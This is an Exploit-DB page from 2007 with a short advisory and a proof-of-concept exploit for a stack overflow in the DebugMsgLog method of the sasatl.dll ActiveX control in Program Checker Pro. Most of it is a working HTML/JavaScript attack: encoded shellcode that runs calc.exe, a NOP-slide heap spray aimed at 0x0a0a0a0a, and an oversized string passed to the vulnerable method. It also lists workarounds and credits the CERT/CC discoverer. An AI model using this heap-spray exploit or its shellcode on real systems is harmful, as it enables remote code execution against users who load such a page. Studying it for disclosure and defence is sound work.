Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray

EDB-ID:

4177

CVE:

N/A

EDB Verified:

Author:

callAX

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2007-07-12

Vulnerable App: 
:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit
=============================================================================

Internal ID: VULWAR200707121.

Introduction
------------
sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com


Tested In
---------
- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
- Windows vista Professional English/French SP1 with IE 7.0


Summary
-------
The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries.


Impact
------
An attacker could execute arbitrary code into the remote machine.


Workaround
----------
- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51.
- Unregister sasatl.dll using regsvr32.


Timeline
--------
July 12 2007 -- Exploit published.


Credits
-------
 * Vulnerability Discovered by Will Dormann CERT/CC.
 * Exploit by callAX <callAX@shellcode.com.ar> from GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 
Technical Details
-----------------

.text:100340F3 sub_100340F3    proc near               ; DATA XREF: .rdata:100ACA6Co
.text:100340F3                                         ; .rdata:100AFC1Cto
.text:100340F3                 mov     eax, offset sub_1009D47C
.text:100340F8                 call    __EH_prolog
.text:100340FD                 push    dword ptr [ebp+0Ch] ; wchar_t *
.text:10034100                 lea     ecx, [ebp+0Ch]
.text:10034103                 call    sub_1005DC32
.text:10034108                 push    dword ptr [ebp+0Ch] ; char
.text:1003410B                 and     dword ptr [ebp-4], 0
.text:1003410F                 push    offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s"
.text:10034114                 push    1               ; int
.text:10034116                 call    sub_10003099
.text:1003411B                 or      dword ptr [ebp-4], 0FFFFFFFFh
.text:1003411F                 add     esp, 0Ch
.text:10034122                 lea     ecx, [ebp+0Ch]
.text:10034125                 call    sub_1005DB6B
.text:1003412A                 mov     ecx, [ebp-0Ch]
.text:1003412D                 xor     eax, eax
.text:1003412F                 mov     large fs:0, ecx
.text:10034136                 leave
.text:10034137                 retn    8

Proof of Concept
----------------

<HTML>
<BODY>
  <object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<h4>Will Dormann from CERT/CC is credited with the discovery.</H4><br>
<h4>This exploits executes calc.exe</h4>
<SCRIPT>


var payLoadCode=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                          "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                          "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                          "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                          "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                          "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                          "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                          "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                          "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                          "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                          "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                          "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                          "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                          "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                          "%u652E%u6578%u9000");

    	var spraySlide = unescape("%u9090%u9090");
  	var heapSprayToAddress = 0x0a0a0a0a;


    function Tryme()
    {
        var size_buff = 2272;
        var x =  unescape("%0a%0a%0a%0a");
        while (x.length<size_buff) x += x;
        x = x.substring(0,size_buff);

        boom.DebugMsgLog(x);
    }
    

       function getSpraySlide(spraySlide, spraySlideSize)
	{
		while (spraySlide.length*2<spraySlideSize)
		{
			spraySlide += spraySlide;
		}
		spraySlide = spraySlide.substring(0,spraySlideSize/2);
		return (spraySlide);
	}

        var heapBlockSize = 0x400000;
        var SizeOfHeapDataMoreover = 0x5;
    	var payLoadSize = (payLoadCode.length * 2);

    	var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
    	var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

    	var memory = new Array();
        spraySlide = getSpraySlide(spraySlide,spraySlideSize);

    	for (i=0;i<heapBlocks;i++)
        {
            memory[i] = spraySlide +  payLoadCode;
        }

</SCRIPT>
<input language=JavaScript onclick=Tryme() type=button value="Launch Exploit">
</BODY>
</HTML>

# milw0rm.com [2007-07-12]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services